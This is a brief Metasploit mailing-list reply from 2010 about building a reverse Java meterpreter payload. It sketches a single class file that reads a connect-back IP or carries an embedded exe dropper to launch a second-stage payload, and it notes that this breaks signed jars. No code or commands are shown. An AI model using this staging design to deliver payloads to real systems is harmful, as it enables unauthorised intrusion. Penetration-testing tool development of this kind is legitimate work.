Metasploit mailing list archives

Re: Using msfpayload to create a reverse java meterpreter

From: egypt () metasploit com
Date: Mon, 16 Aug 2010 19:21:17 -0600

That should make things a lot easier.  We could put an exe in there to
create a dropper or, as you suggest, a file with an IP to connect back
to for a second-stage java payload.  Doing it this way means we can
create a single class file that can easily be used to execute any
other kind of payload or stage.  The only downside I see is that it
will invalidate signed jars, but that problem is also present if we
directly modify a string in the .class files.

Thanks,
egypt

On Mon, Aug 16, 2010 at 6:26 PM, scriptjunkie